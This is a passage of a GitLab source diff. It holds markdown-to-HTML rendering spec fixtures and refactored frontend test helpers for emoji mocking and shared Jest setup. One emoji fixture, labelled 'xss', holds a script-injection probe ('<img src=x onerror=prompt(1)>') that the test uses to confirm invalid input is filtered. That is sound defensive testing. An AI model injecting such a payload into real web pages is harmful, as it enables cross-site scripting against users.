data-sourcepos="1:3-1:22">This is a blockquote</p> + <p data-sourcepos="3:3-3:21">This is another one</p> + </blockquote> + +- name: bold + markdown: |- + **bold** + html: |- + <p data-sourcepos="1:1-1:8" dir="auto"><strong>bold</strong></p> + +- name: bullet_list_style_1 + markdown: |- + * list item 1 + * list item 2 + * embedded list item 3 + html: |- + <ul data-sourcepos="1:1-3:24" dir="auto"> + <li data-sourcepos="1:1-1:13">list item 1</li> + <li data-sourcepos="2:1-3:24">list item 2 + <ul data-sourcepos="3:3-3:24"> + <li data-sourcepos="3:3-3:24">embedded list item 3</li> + </ul> + </li> + </ul> + +- name: bullet_list_style_2 + markdown: |- + - list item 1 + - list item 2 + * embedded list item 3 + html: |- + <ul data-sourcepos="1:1-3:24" 
dir="auto"> + <li data-sourcepos="1:1-1:13">list item 1</li> + <li data-sourcepos="2:1-3:24">list item 2 + <ul data-sourcepos="3:3-3:24"> + <li data-sourcepos="3:3-3:24">embedded list item 3</li> + </ul> + </li> + </ul> + +- name: bullet_list_style_3 + markdown: |- + + list item 1 + + list item 2 + - embedded list item 3 + html: |- + <ul data-sourcepos="1:1-3:24" dir="auto"> + <li data-sourcepos="1:1-1:13">list item 1</li> + <li data-sourcepos="2:1-3:24">list item 2 + <ul data-sourcepos="3:3-3:24"> + <li data-sourcepos="3:3-3:24">embedded list item 3</li> + </ul> + </li> + </ul> + +- name: code_block + markdown: |- + ```javascript + console.log('hello world') + ``` + html: |- + <div class="gl-relative markdown-code-block js-markdown-code"> + <pre data-sourcepos="1:1-3:3" class="code highlight js-syntax-highlight language-javascript" lang="javascript" v-pre="true"><code><span id="LC1" class="line" lang="javascript"> <span class="nx">console</span><span class="p">.</span><span class="nx">log</span><span class="p">(</span><span class="dl">'</span><span class="s1">hello world</span><span class="dl">'</span><span class="p">)</span></span></code></pre> + <copy-code></copy-code> + </div> + +- name: color_chips + markdown: |- + - `#F00` + - `#F00A` + - `#FF0000` + - `#FF0000AA` + - `RGB(0,255,0)` + - `RGB(0%,100%,0%)` + - `RGBA(0,255,0,0.3)` + - `HSL(540,70%,50%)` + - `HSLA(540,70%,50%,0.3)` + html: |- + <ul data-sourcepos="1:1-9:25" dir="auto"> + <li data-sourcepos="1:1-1:8"><code>#F00<span class="gfm-color_chip"><span style="background-color: #F00;"></span></span></code></li> + <li data-sourcepos="2:1-2:9"><code>#F00A<span class="gfm-color_chip"><span style="background-color: #F00A;"></span></span></code></li> + <li data-sourcepos="3:1-3:11"><code>#FF0000<span class="gfm-color_chip"><span style="background-color: #FF0000;"></span></span></code></li> + <li data-sourcepos="4:1-4:13"><code>#FF0000AA<span class="gfm-color_chip"><span style="background-color: 
#FF0000AA;"></span></span></code></li> + <li data-sourcepos="5:1-5:16"><code>RGB(0,255,0)<span class="gfm-color_chip"><span style="background-color: RGB(0,255,0);"></span></span></code></li> + <li data-sourcepos="6:1-6:19"><code>RGB(0%,100%,0%)<span class="gfm-color_chip"><span style="background-color: RGB(0%,100%,0%);"></span></span></code></li> + <li data-sourcepos="7:1-7:21"><code>RGBA(0,255,0,0.3)<span class="gfm-color_chip"><span style="background-color: RGBA(0,255,0,0.3);"></span></span></code></li> + <li data-sourcepos="8:1-8:20"><code>HSL(540,70%,50%)<span class="gfm-color_chip"><span style="background-color: HSL(540,70%,50%);"></span></span></code></li> + <li data-sourcepos="9:1-9:25"><code>HSLA(540,70%,50%,0.3)<span class="gfm-color_chip"><span style="background-color: HSLA(540,70%,50%,0.3);"></span></span></code></li> + </ul> + +- name: description_list + markdown: |- + <dl> + <dt>Frog</dt> + <dd>Wet green thing</dd> + <dt>Rabbit</dt> + <dd>Warm fluffy thing</dd> + <dt>Punt</dt> + <dd>Kick a ball</dd> + <dd>Take a bet</dd> + <dt>Color</dt> + <dt>Colour</dt> + <dd> + + Any hue except _white_ or **black** + + </dd> + </dl> + html: |- + <dl> + <dt>Frog</dt> + <dd>Wet green thing</dd> + <dt>Rabbit</dt> + <dd>Warm fluffy thing</dd> + <dt>Punt</dt> + <dd>Kick a ball</dd> + <dd>Take a bet</dd> + <dt>Color</dt> + <dt>Colour</dt> + <dd> + <p data-sourcepos="13:1-13:35">Any hue except <em>white</em> or <strong>black</strong></p> + </dd> + </dl> + +- name: details + markdown: |- + <details> + <summary>This is the visible summary of the collapsible section</summary> + + 1. collapsed markdown + 2. 
more collapsed markdown + + </details> + html: |- + <details> + <summary>This is the visible summary of the collapsible section</summary> + <ol data-sourcepos="4:1-6:0"> + <li data-sourcepos="4:1-4:21">collapsed markdown</li> + <li data-sourcepos="5:1-6:0">more collapsed markdown</li> + </ol> + </details> + +- name: div + markdown: |- + <div>plain text</div> + <div> + + just a plain ol' div, not much to _expect_! + + </div> + html: |- + <div>plain text</div> + <div> + <p data-sourcepos="4:1-4:43">just a plain ol' div, not much to <em>expect</em>!</p> + </div> + +- name: emoji + markdown: |- + :sparkles: :heart: :100: + html: |- + <p data-sourcepos="1:1-1:24" dir="auto"><gl-emoji title="sparkles" data-name="sparkles" data-unicode-version="6.0">✨</gl-emoji> <gl-emoji title="heavy black heart" data-name="heart" data-unicode-version="1.1">❤</gl-emoji> <gl-emoji title="hundred points symbol" data-name="100" data-unicode-version="6.0">💯</gl-emoji></p> + +- name: emphasis + markdown: _emphasized text_ + html: <p data-sourcepos="1:1-1:17" dir="auto"><em>emphasized text</em></p> + +- name: figure + markdown: |- + <figure> + + ![Elephant at sunset](elephant-sunset.jpg) + + <figcaption>An elephant at sunset</figcaption> + </figure> + <figure> + + ![A crocodile wearing crocs](croc-crocs.jpg) + + <figcaption> + + A crocodile wearing _crocs_! 
+ + </figcaption> + </figure> + html: |- + <figure> + <p data-sourcepos="3:1-3:42"><a class="no-attachment-icon" href="elephant-sunset.jpg" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="Elephant at sunset" class="lazy" data-src="elephant-sunset.jpg"></a></p> + <figcaption>An elephant at sunset</figcaption> + </figure> + <figure> + <p data-sourcepos="9:1-9:44"><a class="no-attachment-icon" href="croc-crocs.jpg" target="_blank" rel="noopener noreferrer"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="A crocodile wearing crocs" class="lazy" data-src="croc-crocs.jpg"></a></p> + <figcaption> + <p data-sourcepos="13:1-13:28">A crocodile wearing <em>crocs</em>!</p> + </figcaption> + </figure> + +- name: footnotes + substitutions: + # NOTE: We don't care about verifying specific attribute values here, that should be the + # responsibility of unit tests. These tests are about the structure of the HTML. + fn_href_substitution: + - regex: '(href)(=")(.+?)(")' + replacement: '\1\2REF\4' + footnote_id_substitution: + - regex: '(id)(=")(.+?)(")' + replacement: '\1\2ID\4' + + pending: + backend: https://gitlab.com/gitlab-org/gitlab/-/issues/346591 + markdown: |- + A footnote reference tag looks like this: [^1] + + This reference tag is a mix of letters and numbers. [^2] + + [^1]: This is the text inside a footnote. + [^2]: This is another footnote. + html: |- + <p data-sourcepos="1:1-1:46" dir="auto">A footnote reference tag looks like this: <sup class="footnote-ref"><a href="#fn-1-2717" id="fnref-1-2717" data-footnote-ref="">1</a></sup></p> + <p data-sourcepos="3:1-3:56" dir="auto">This reference tag is a mix of letters and numbers. 
<sup class="footnote-ref"><a href="#fn-2-2717" id="fnref-2-2717" data-footnote-ref="">2</a></sup></p> + <section class="footnotes" data-footnotes><ol> + <li id="fn-1-2717"> + <p data-sourcepos="5:7-5:41">This is the text inside a footnote. <a href="#fnref-1-2717" aria-label="Back to content" class="footnote-backref" data-footnote-backref=""><gl-emoji title="leftwards arrow with hook" data-name="leftwards_arrow_with_hook" data-unicode-version="1.1">↩</gl-emoji></a></p> + </li> + <li id="fn-2-2717"> + <p data-sourcepos="6:7-6:31">This is another footnote. <a href="#fnref-2-2717" aria-label="Back to content" class="footnote-backref" data-footnote-backref=""><gl-emoji title="leftwards arrow with hook" data-name="leftwards_arrow_with_hook" data-unicode-version="1.1">↩</gl-emoji></a></p> + </li> + </ol></section> + +- name: frontmatter_json + markdown: |- + ;;; + { + "title": "Page title" + } + ;;; + html: |- + <div class="gl-relative markdown-code-block js-markdown-code"> + <pre data-sourcepos="1:1-5:3" class="code highlight js-syntax-highlight language-json" lang="json" data-lang-params="frontmatter" v-pre="true"><code><span id="LC1" class="line" lang="json"><span class="p">{</span></span> + <span id="LC2" class="line" lang="json"><span class="w"> </span><span class="nl">"title"</span><span class="p">:</span><span class="w"> </span><span class="s2">"Page title"</span></span> + <span id="LC3" class="line" lang="json"><span class="p">}</span></span></code></pre> + <copy-code></copy-code> + </div> + +- name: frontmatter_toml + markdown: |- + +++ + title = "Page title" + +++ + html: |- + <div class="gl-relative markdown-code-block js-markdown-code"> + <pre data-sourcepos="1:1-3:3" class="code highlight js-syntax-highlight language-toml" lang="toml" data-lang-params="frontmatter" v-pre="true"><code><span id="LC1" class="line" lang="toml"><span class="py">title</span> <span class="p">=</span> <span class="s">"Page title"</span></span></code></pre> + <copy-code></copy-code> + 
</div> + +- name: frontmatter_yaml + markdown: |- + --- + title: Page title + --- + html: |- + <div class="gl-relative markdown-code-block js-markdown-code"> + <pre data-sourcepos="1:1-3:3" class="code highlight js-syntax-highlight language-yaml" lang="yaml" data-lang-params="frontmatter" v-pre="true"><code><span id="LC1" class="line" lang="yaml"><span class="na">title</span><span class="pi">:</span> <span class="s">Page title</span></span></code></pre> + <copy-code></copy-code> + </div> + +- name: hard_break + markdown: |- + This is a line after a\ + hard break + html: |- + <p data-sourcepos="1:1-2:10" dir="auto">This is a line after a<br> + hard break</p> + +- name: headings + markdown: |- + # Heading 1 + + ## Heading 2 + + ### Heading 3 + + #### Heading 4 + + ##### Heading 5 + + ###### Heading 6 + html: |- + <h1 data-sourcepos="1:1-1:11" dir="auto"> + <a id="user-content-heading-1" class="anchor" href="#heading-1" aria-hidden="true"></a>Heading 1</h1> + <h2 data-sourcepos="3:1-3:12" dir="auto"> + <a id="user-content-heading-2" class="anchor" href="#heading-2" aria-hidden="true"></a>Heading 2</h2> + <h3 data-sourcepos="5:1-5:13" dir="auto"> + <a id="user-content-heading-3" class="anchor" href="#heading-3" aria-hidden="true"></a>Heading 3</h3> + <h4 data-sourcepos="7:1-7:14" dir="auto"> + <a id="user-content-heading-4" class="anchor" href="#heading-4" aria-hidden="true"></a>Heading 4</h4> + <h5 data-sourcepos="9:1-9:15" dir="auto"> + <a id="user-content-heading-5" class="anchor" href="#heading-5" aria-hidden="true"></a>Heading 5</h5> + <h6 data-sourcepos="11:1-11:16" dir="auto"> + <a id="user-content-heading-6" class="anchor" href="#heading-6" aria-hidden="true"></a>Heading 6</h6> + +- name: horizontal_rule + markdown: |- + --- + html: |- + <hr data-sourcepos="1:1-1:3"> + +- name: html_marks + markdown: |- + * Content editor is ~~great~~<ins>amazing</ins>. 
+ * If the changes <abbr title="Looks good to merge">LGTM</abbr>, please <abbr title="Merge when pipeline succeeds">MWPS</abbr>. + * The English song <q>Oh I do like to be beside the seaside</q> looks like this in Hebrew: <span dir="rtl">אה, אני אוהב להיות ליד חוף הים</span>. In the computer's memory, this is stored as <bdo dir="ltr">אה, אני אוהב להיות ליד חוף הים</bdo>. + * <cite>The Scream</cite> by Edvard Munch. Painted in 1893. + * <dfn>HTML</dfn> is the standard markup language for creating web pages. + * Do not forget to buy <mark>milk</mark> today. + * This is a paragraph and <small>smaller text goes here</small>. + * The concert starts at <time datetime="20:00">20:00</time> and you'll be able to enjoy the band for at least <time datetime="PT2H30M">2h 30m</time>. + * Press <kbd>Ctrl</kbd> + <kbd>C</kbd> to copy text (Windows). + * WWF's goal is to: <q>Build a future where people live in harmony with nature.</q> We hope they succeed. + * The error occured was: <samp>Keyboard not found. Press F1 to continue.</samp> + * The area of a triangle is: 1/2 x <var>b</var> x <var>h</var>, where <var>b</var> is the base, and <var>h</var> is the vertical height. + * <ruby>漢<rt>ㄏㄢˋ</rt></ruby> + * C<sub>7</sub>H<sub>16</sub> + O<sub>2</sub> → CO<sub>2</sub> + H<sub>2</sub>O + * The **Pythagorean theorem** is often expressed as <var>a<sup>2</sup></var> + <var>b<sup>2</sup></var> = <var>c<sup>2</sup></var> + html: |- + <ul data-sourcepos="1:1-15:130" dir="auto"> + <li data-sourcepos="1:1-1:48">Content editor is <del>great</del><ins>amazing</ins>.</li> + <li data-sourcepos="2:1-2:126">If the changes <abbr title="Looks good to merge">LGTM</abbr>, please <abbr title="Merge when pipeline succeeds">MWPS</abbr>.</li> + <li data-sourcepos="3:1-3:288">The English song <q>Oh I do like to be beside the seaside</q> looks like this in Hebrew: <span dir="rtl">אה, אני אוהב להיות ליד חוף הים</span>. 
In the computer's memory, this is stored as <bdo dir="ltr">אה, אני אוהב להיות ליד חוף הים</bdo>.</li> + <li data-sourcepos="4:1-4:59"> + <cite>The Scream</cite> by Edvard Munch. Painted in 1893.</li> + <li data-sourcepos="5:1-5:73"> + <dfn>HTML</dfn> is the standard markup language for creating web pages.</li> + <li data-sourcepos="6:1-6:47">Do not forget to buy <mark>milk</mark> today.</li> + <li data-sourcepos="7:1-7:64">This is a paragraph and <small>smaller text goes here</small>.</li> + <li data-sourcepos="8:1-8:149">The concert starts at <time datetime="20:00">20:00</time> and you'll be able to enjoy the band for at least <time datetime="PT2H30M">2h 30m</time>.</li> + <li data-sourcepos="9:1-9:62">Press <kbd>Ctrl</kbd> + <kbd>C</kbd> to copy text (Windows).</li> + <li data-sourcepos="10:1-10:105">WWF's goal is to: <q>Build a future where people live in harmony with nature.</q> We hope they succeed.</li> + <li data-sourcepos="11:1-11:79">The error occured was: <samp>Keyboard not found. 
Press F1 to continue.</samp> + </li> + <li data-sourcepos="12:1-12:136">The area of a triangle is: 1/2 x <var>b</var> x <var>h</var>, where <var>b</var> is the base, and <var>h</var> is the vertical height.</li> + <li data-sourcepos="13:1-13:35"><ruby>漢<rt>ㄏㄢˋ</rt></ruby></li> + <li data-sourcepos="14:1-14:81">C<sub>7</sub>H<sub>16</sub> + O<sub>2</sub> → CO<sub>2</sub> + H<sub>2</sub>O</li> + <li data-sourcepos="15:1-15:130">The <strong>Pythagorean theorem</strong> is often expressed as <var>a<sup>2</sup></var> + <var>b<sup>2</sup></var> = <var>c<sup>2</sup></var> + </li> + </ul> + +- name: image + markdown: |- + ![alt text](https://gitlab.com/logo.png) + html: |- + <p data-sourcepos="1:1-1:40" dir="auto"><a class="no-attachment-icon" href="https://gitlab.com/logo.png" target="_blank" rel="nofollow noreferrer noopener"><img src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw==" alt="alt text" class="lazy" data-src="https://gitlab.com/logo.png"></a></p> + +- name: inline_code + markdown: |- + `code` + html: |- + <p data-sourcepos="1:1-1:6" dir="auto"><code>code</code></p> + +- name: inline_diff + markdown: |- + * {-deleted-} + * {+added+} + html: |- + <ul data-sourcepos="1:1-2:11" dir="auto"> + <li data-sourcepos="1:1-1:13"><span class="idiff left right deletion">deleted</span></li> + <li data-sourcepos="2:1-2:11"><span class="idiff left right addition">added</span></li> + </ul> + +- name: label + pending: + # TODO: There is an error with the frontend HTML to markdown spec adding a double escape (\\) to the label tilde. + frontend: 'There is an error with the frontend HTML to markdown spec adding a double escape (\\) to the label tilde.' 
+ markdown: |- + ~bug + html: |- + <p data-sourcepos="1:1-1:4" dir="auto">~bug</p> + +- name: link + markdown: |- + [GitLab](https://gitlab.com) + html: |- + <p data-sourcepos="1:1-1:28" dir="auto"><a href="https://gitlab.com" rel="nofollow noreferrer noopener" target="_blank">GitLab</a></p> + +- name: math + markdown: |- + This math is inline $`a^2+b^2=c^2`$. + + This is on a separate line: + + ```math + a^2+b^2=c^2 + ``` + html: |- + <p data-sourcepos="1:1-1:36" dir="auto">This math is inline <code class="code math js-render-math" data-math-style="inline">a^2+b^2=c^2</code>.</p> + <p data-sourcepos="3:1-3:27" dir="auto">This is on a separate line:</p> + <div class="gl-relative markdown-code-block js-markdown-code"> + <pre data-sourcepos="5:1-7:3" class="code highlight js-syntax-highlight language-math js-render-math" lang="math" v-pre="true" data-math-style="display"><code><span id="LC1" class="line" lang="math">a^2+b^2=c^2</span></code></pre> + <copy-code></copy-code> + </div> + +- name: ordered_list + markdown: |- + 1. list item 1 + 2. list item 2 + 3. list item 3 + html: |- + <ol data-sourcepos="1:1-3:14" dir="auto"> + <li data-sourcepos="1:1-1:14">list item 1</li> + <li data-sourcepos="2:1-2:14">list item 2</li> + <li data-sourcepos="3:1-3:14">list item 3</li> + </ol> + +- name: ordered_list_with_start_order + markdown: |- + 134. list item 1 + 135. list item 2 + 136. list item 3 + html: |- + <ol start="134" data-sourcepos="1:1-3:16" dir="auto"> + <li data-sourcepos="1:1-1:16">list item 1</li> + <li data-sourcepos="2:1-2:16">list item 2</li> + <li data-sourcepos="3:1-3:16">list item 3</li> + </ol> + +- name: ordered_task_list + markdown: |- + 1. [x] hello + 2. [x] world + 3. [ ] example + 1. [ ] of nested + 1. [x] task list + 2. 
[ ] items + html: |- + <ol data-sourcepos="1:1-6:18" class="task-list" dir="auto"> + <li data-sourcepos="1:1-1:12" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> hello</li> + <li data-sourcepos="2:1-2:12" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> world</li> + <li data-sourcepos="3:1-6:18" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" disabled> example + <ol data-sourcepos="4:4-6:18" class="task-list"> + <li data-sourcepos="4:4-6:18" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" disabled> of nested + <ol data-sourcepos="5:7-6:18" class="task-list"> + <li data-sourcepos="5:7-5:22" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> task list</li> + <li data-sourcepos="6:7-6:18" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" disabled> items</li> + </ol> + </li> + </ol> + </li> + </ol> + +- name: ordered_task_list_with_order + markdown: |- + 4893. [x] hello + 4894. [x] world + 4895. [ ] example + html: |- + <ol start="4893" data-sourcepos="1:1-3:17" class="task-list" dir="auto"> + <li data-sourcepos="1:1-1:15" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> hello</li> + <li data-sourcepos="2:1-2:15" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> world</li> + <li data-sourcepos="3:1-3:17" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" disabled> example</li> + </ol> + +- name: reference_for_project_wiki + api_context: project_wiki + substitutions: + # NOTE: We don't care about verifying specific attribute values here, that should be the + # responsibility of unit tests. These tests are about the structure of the HTML. 
+ uri_substitution: *uri_substitution + data_attribute_id_substitution: + - regex: '(data-user|data-project|data-issue|data-iid|data-merge-request|data-milestone)(=")(\d+?)(")' + replacement: '\1\2ID\4' + text_attribute_substitution: + - regex: '(title)(=")(.+?)(")' + replacement: '\1\2TEXT\4' + path_attribute_id_substitution: + - regex: '(group|project)(\d+)' + replacement: '\1ID' + markdown: |- + Hi @gfm_user - thank you for reporting this bug (#1) we hope to fix it in %1.1 as part of !1 + html: |- + <p data-sourcepos="1:1-1:92" dir="auto">Hi <a href="/gfm_user" data-user="1" data-reference-type="user" data-container="body" data-placement="top" class="gfm gfm-project_member js-user-link" title="John Doe1">@gfm_user</a> - thank you for reporting this bug (<a href="/group1/project1/-/issues/1" data-original="#1" data-link="false" data-link-reference="false" data-project="11" data-issue="11" data-reference-type="issue" data-container="body" data-placement="top" title="My title 1" class="gfm gfm-issue has-tooltip">#1</a>) we hope to fix it in <a href="/group1/project1/-/milestones/1" data-original="%1.1" data-link="false" data-link-reference="false" data-project="11" data-milestone="11" data-reference-type="milestone" data-container="body" data-placement="top" title="" class="gfm gfm-milestone has-tooltip">%1.1</a> as part of <a href="/group1/project1/-/merge_requests/1" data-original="!1" data-link="false" data-link-reference="false" data-project="11" data-merge-request="11" data-project-path="group1/project1" data-iid="1" data-mr-title="My title 2" data-reference-type="merge_request" data-container="body" data-placement="top" title="" class="gfm gfm-merge_request">!1</a></p> +- name: strike + markdown: |- + ~~del~~ + html: |- + <p data-sourcepos="1:1-1:7" dir="auto"><del>del</del></p> + +- name: table + markdown: |- + | header | header | + |--------|--------| + | `code` | cell with **bold** | + | ~~strike~~ | cell with _italic_ | + + # content after table + html: 
|- + <table data-sourcepos="1:1-4:35" dir="auto"> + <thead> + <tr data-sourcepos="1:1-1:19"> + <th data-sourcepos="1:2-1:9">header</th> + <th data-sourcepos="1:11-1:18">header</th> + </tr> + </thead> + <tbody> + <tr data-sourcepos="3:1-3:31"> + <td data-sourcepos="3:2-3:9"><code>code</code></td> + <td data-sourcepos="3:11-3:30">cell with <strong>bold</strong> + </td> + </tr> + <tr data-sourcepos="4:1-4:35"> + <td data-sourcepos="4:2-4:13"><del>strike</del></td> + <td data-sourcepos="4:15-4:34">cell with <em>italic</em> + </td> + </tr> + </tbody> + </table> + <h1 data-sourcepos="6:1-6:21" dir="auto"> + <a id="user-content-content-after-table" class="anchor" href="#content-after-table" aria-hidden="true"></a>content after table</h1> + +- name: table_of_contents + markdown: |- + [[_TOC_]] + + # Lorem + + Well, that's just like... your opinion.. man. + + ## Ipsum + + ### Dolar + + # Sit amit + + ### I don't know + html: |- + <ul class="section-nav"> + <li> + <a href="#lorem">Lorem</a><ul><li> + <a href="#ipsum">Ipsum</a><ul><li><a href="#dolar">Dolar</a></li></ul> + </li></ul> + </li> + <li> + <a href="#sit-amit">Sit amit</a><ul><li><a href="#i-dont-know">I don't know</a></li></ul> + </li> + </ul> + <h1 data-sourcepos="3:1-3:7" dir="auto"> + <a id="user-content-lorem" class="anchor" href="#lorem" aria-hidden="true"></a>Lorem</h1> + <p data-sourcepos="5:1-5:45" dir="auto">Well, that's just like... your opinion.. 
man.</p> + <h2 data-sourcepos="7:1-7:8" dir="auto"> + <a id="user-content-ipsum" class="anchor" href="#ipsum" aria-hidden="true"></a>Ipsum</h2> + <h3 data-sourcepos="9:1-9:9" dir="auto"> + <a id="user-content-dolar" class="anchor" href="#dolar" aria-hidden="true"></a>Dolar</h3> + <h1 data-sourcepos="11:1-11:10" dir="auto"> + <a id="user-content-sit-amit" class="anchor" href="#sit-amit" aria-hidden="true"></a>Sit amit</h1> + <h3 data-sourcepos="13:1-13:16" dir="auto"> + <a id="user-content-i-dont-know" class="anchor" href="#i-dont-know" aria-hidden="true"></a>I don't know</h3> + +- name: task_list + markdown: |- + * [x] hello + * [x] world + * [ ] example + * [ ] of nested + * [x] task list + * [ ] items + html: |- + <ul data-sourcepos="1:1-6:15" class="task-list" dir="auto"> + <li data-sourcepos="1:1-1:11" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> hello</li> + <li data-sourcepos="2:1-2:11" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> world</li> + <li data-sourcepos="3:1-6:15" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" disabled> example + <ul data-sourcepos="4:3-6:15" class="task-list"> + <li data-sourcepos="4:3-6:15" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" disabled> of nested + <ul data-sourcepos="5:5-6:15" class="task-list"> + <li data-sourcepos="5:5-5:19" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" checked disabled> task list</li> + <li data-sourcepos="6:5-6:15" class="task-list-item"> + <input type="checkbox" class="task-list-item-checkbox" disabled> items</li> + </ul> + </li> + </ul> + </li> + </ul> + +- name: video + markdown: |- + ![Sample Video](https://gitlab.com/gitlab.mp4) + html: |- + <p data-sourcepos="1:1-1:46" dir="auto"><span class="media-container video-container"><video src="https://gitlab.com/gitlab.mp4" controls="true" 
data-setup="{}" data-title="Sample Video" width="400" preload="metadata"></video><a href="https://gitlab.com/gitlab.mp4" target="_blank" rel="nofollow noreferrer noopener" title="Download 'Sample Video'">Sample Video</a></span></p> + +- name: word_break + markdown: Fernstraßen<wbr>bau<wbr>privat<wbr>finanzierungs<wbr>gesetz + html: <p data-sourcepos="1:1-1:60" dir="auto">Fernstraßen<wbr>bau<wbr>privat<wbr>finanzierungs<wbr>gesetz</wbr></wbr></wbr></wbr></p> diff --git a/spec/fixtures/packages/generic/myfile.zip b/spec/fixtures/packages/generic/myfile.zip Binary files differnew file mode 100644 index 00000000000..6048bd2f246 --- /dev/null +++ b/spec/fixtures/packages/generic/myfile.zip diff --git a/spec/frontend/__helpers__/emoji.js b/spec/frontend/__helpers__/emoji.js index a64135601ae..014a7854024 100644 --- a/spec/frontend/__helpers__/emoji.js +++ b/spec/frontend/__helpers__/emoji.js @@ -1,8 +1,7 @@ -import MockAdapter from 'axios-mock-adapter'; import { initEmojiMap, EMOJI_VERSION } from '~/emoji'; -import axios from '~/lib/utils/axios_utils'; +import { CACHE_VERSION_KEY, CACHE_KEY } from '~/emoji/constants'; -export const emojiFixtureMap = { +export const validEmoji = { atom: { moji: '⚛', description: 'atom symbol', @@ -49,11 +48,39 @@ export const emojiFixtureMap = { unicodeVersion: '5.1', description: 'white medium star', }, + gay_pride_flag: { + moji: '🏳️🌈', + unicodeVersion: '7.0', + description: 'because it contains a zero width joiner', + }, + family_mmb: { + moji: '👨👨👦', + unicodeVersion: '6.0', + description: 'because it contains multiple zero width joiners', + }, +}; + +export const invalidEmoji = { xss: { moji: '<img src=x onerror=prompt(1)>', unicodeVersion: '5.1', description: 'xss', }, + non_moji: { + moji: 'I am not an emoji...', + unicodeVersion: '9.0', + description: '...and should be filtered out', + }, + multiple_moji: { + moji: '🍂🏭', + unicodeVersion: '9.0', + description: 'Multiple separate emoji that are not joined by a zero width joiner', 
+ }, +}; + +export const emojiFixtureMap = { + ...validEmoji, + ...invalidEmoji, }; export const mockEmojiData = Object.keys(emojiFixtureMap).reduce((acc, k) => { @@ -63,11 +90,14 @@ export const mockEmojiData = Object.keys(emojiFixtureMap).reduce((acc, k) => { return acc; }, {}); -export async function initEmojiMock(mockData = mockEmojiData) { - const mock = new MockAdapter(axios); - mock.onGet(`/-/emojis/${EMOJI_VERSION}/emojis.json`).reply(200, JSON.stringify(mockData)); +export function clearEmojiMock() { + localStorage.clear(); + initEmojiMap.promise = null; +} +export async function initEmojiMock(mockData = mockEmojiData) { + clearEmojiMock(); + localStorage.setItem(CACHE_VERSION_KEY, EMOJI_VERSION); + localStorage.setItem(CACHE_KEY, JSON.stringify(mockData)); await initEmojiMap(); - - return mock; } diff --git a/spec/frontend/__helpers__/experimentation_helper.js b/spec/frontend/__helpers__/experimentation_helper.js index e0156226acc..d5044be88d7 100644 --- a/spec/frontend/__helpers__/experimentation_helper.js +++ b/spec/frontend/__helpers__/experimentation_helper.js @@ -25,7 +25,7 @@ export function stubExperiments(experiments = {}) { window.gon.experiment = window.gon.experiment || {}; // Preferred window.gl = window.gl || {}; - window.gl.experiments = window.gl.experiemnts || {}; + window.gl.experiments = window.gl.experiments || {}; Object.entries(experiments).forEach(([name, variant]) => { const experimentData = { experiment: name, variant }; diff --git a/spec/frontend/matchers.js b/spec/frontend/__helpers__/matchers.js index 945abdafe9a..945abdafe9a 100644 --- a/spec/frontend/matchers.js +++ b/spec/frontend/__helpers__/matchers.js diff --git a/spec/frontend/matchers_spec.js b/spec/frontend/__helpers__/matchers_spec.js index dfd6f754c72..dfd6f754c72 100644 --- a/spec/frontend/matchers_spec.js +++ b/spec/frontend/__helpers__/matchers_spec.js diff --git a/spec/frontend/__helpers__/mock_apollo_helper.js b/spec/frontend/__helpers__/mock_apollo_helper.js 
index 520d6c72541..ee4bbd42b1e 100644 --- a/spec/frontend/__helpers__/mock_apollo_helper.js +++ b/spec/frontend/__helpers__/mock_apollo_helper.js @@ -26,7 +26,5 @@ export function createMockClient(handlers = [], resolvers = {}, cacheOptions = { export default function createMockApollo(handlers, resolvers, cacheOptions) { const mockClient = createMockClient(handlers, resolvers, cacheOptions); - const apolloProvider = new VueApollo({ defaultClient: mockClient }); - - return apolloProvider; + return new VueApollo({ defaultClient: mockClient }); } diff --git a/spec/frontend/mocks/ce/lib/utils/axios_utils.js b/spec/frontend/__helpers__/mocks/axios_utils.js index 674563b9f28..674563b9f28 100644 --- a/spec/frontend/mocks/ce/lib/utils/axios_utils.js +++ b/spec/frontend/__helpers__/mocks/axios_utils.js diff --git a/spec/frontend/__helpers__/shared_test_setup.js b/spec/frontend/__helpers__/shared_test_setup.js new file mode 100644 index 00000000000..03389e16b65 --- /dev/null +++ b/spec/frontend/__helpers__/shared_test_setup.js @@ -0,0 +1,90 @@ +/* Common setup for both unit and integration test environments */ +import { config as testUtilsConfig } from '@vue/test-utils'; +import * as jqueryMatchers from 'custom-jquery-matchers'; +import Vue from 'vue'; +import 'jquery'; +import Translate from '~/vue_shared/translate'; +import setWindowLocation from './set_window_location_helper'; +import { setGlobalDateToFakeDate } from './fake_date'; +import { loadHTMLFixture, setHTMLFixture } from './fixtures'; +import { TEST_HOST } from './test_constants'; +import customMatchers from './matchers'; + +import './dom_shims'; +import './jquery'; +import '~/commons/bootstrap'; + +// This module has some fairly decent visual test coverage in it's own repository. +jest.mock('@gitlab/favicon-overlay'); + +process.on('unhandledRejection', global.promiseRejectionHandler); + +// Fake the `Date` for the rest of the jest spec runtime environment. 
